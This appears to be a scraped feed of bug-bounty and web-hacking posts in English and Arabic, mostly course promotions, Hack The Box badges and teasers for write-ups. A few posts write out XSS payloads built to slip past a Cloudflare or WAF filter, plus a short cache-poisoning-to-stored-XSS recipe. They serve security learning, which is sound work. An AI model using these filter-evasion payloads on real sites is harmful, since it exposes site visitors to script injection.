CloudFlare XSS Bypass : "><P/onpointerenter=alert(1)>

A Modern Exploration of Windows Memory Corruption Exploits - Part I: Stack Overflows forrest-orr.net/post/a-modern-…

Trying to write Linux x86 Shellcode in assembly. So far going good =)

publication of my latest modest paper; Eclipse on Next.js: Conditioned exploitation of an intended race-condition - (CVE-2025-32421) enabling a partial bypass of my previous vulnerability, CVE-2024-46982 by chaining a race-condition to a cache-poisoning zhero-web-sec.github.io/research-and-t…

Race Condition Led to Admin Takeover خطأ مبرمج سمح لنا نخترق حساب الادمن ! بالبدايه رجعت لكم بمقالة جديدة انا و Abdullah Angawi قبل مانبدا اغلبكم اكيد عارف وش هو الrace condition بس الي اغلبه مايعرف انه فيه نوع اسمه time-of-check to time-of-use طيب بسم الله خلونا بالبدايه

كيف اخترقت نظام شركة كبرى ووصلت لبيانات الموظفين وقدرت أتحكم بأي رقم جوال تابع لهم؟ قصتي مع هالتارقت بدت بشكل عادي، مثل أي فحص أسويه للمواقع. بس اللي خلاني أركز عليه أكثر إني كنت أتابع الشركة هذي على السوشال ميديا، وشفت لهم إعلان إنهم نزلوا نسخة جديدة من تطبيقاتهم ومواقعهم،

الدورة جدا مناسبة لاي شخص يبي يتعلم مجال برمجة واختراق المواقع الالكترونية ، ركزنا بهذه الدورة على قصر المقاطع واعطاكم جوهر الموضوع عشان تستفيدوا باقصى طريقة ممكنة ❤️ • الدورة راح تتحدث باستمرار وتنضاف تحديات جديدة بين كل فترة وفترة ان شاء الله

🛡️ Since June 1st, we've been one of the most active and impactful voices in Cyber Security & Bug Bounty — maybe even the most. If you’ve learned something from us or just support the mission a retweet and follow goes a long way!💙 Youtube: youtube.com/@nullsecurityx #BugBounty

Bug Bounty Tip You can use these tricks to bypass the `alert` block by XSS WAF - (function(x){this[x+`ert`](1)})`al` - window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2) - document['default'+'View'][`\u0061lert`](3)

Bug bounty, feedback, strategy, and alchemy frequently asked for advice, roadmaps, and more, I finally took the time, after 2–3 years of bug bounty, to write down my vision, thoughts and perspective on the subject non-technical, no research this time! zhero-web-sec.github.io/thoughts/bugbo…

السلام عليكم ، تكلمت عن CVE-2025-43200 الـCVE يصيب الـiPhone 👾 youtu.be/iyYXBsMv_Y8?si…

Since you pull the strings around here… 🫵 Put your red team to the test with TWO new Professional Lab scenarios, freshly migrated from Vulnlab! Simulate internal engagements in realistic enterprise #AD environments and sharpen skills in stealthy C2 operations, lateral movement,

Men are brave!

I just completed module File Inclusion in HTB Academy! academy.hackthebox.com/achievement/15… #hackthebox #htbacademy #cybersecurity

I just completed module Session Security in HTB Academy! academy.hackthebox.com/achievement/15… #hackthebox #htbacademy #cybersecurity

I just completed module Web Service academy.hackthebox.com/achievement/15… #hackthebox #htbacademy #cybersecurity

I just completed module Hacking WordPress in HTB Academy! academy.hackthebox.com/achievement/15… #hackthebox #htbacademy #cybersecurity

I just completed path Bug Bounty Hunter in HTB Academy! academy.hackthebox.com/achievement/15… #hackthebox #htbacademy #cybersecurity

🔴كيف قدرت اتحكم بسيرفر لأحد الجهات الحساسة بشكل كامل واكتشف اكثر من 15 ثغرة حرجة. a Single LFI to +15 Critical Bugs A Web-Boundary Pivoting Story مسيتم بالخير, رجعا لكم بمقالة جديد بعد انقطاع, لكن على ماقال من طول الغيبات جاب الغنايم اليوم باذن الله بتكلم عن طريقة اكتشافي

Cache Poisoning → Stored XSS 1️⃣ App reflects unsanitized headers (e.g. X-Forwarded-Host) in responses. 2️⃣ Reverse proxy caches malicious response. 3️⃣ Other users get poisoned cached content. 4️⃣ Leads to Stored XSS affecting multiple victims. #BugBounty #xss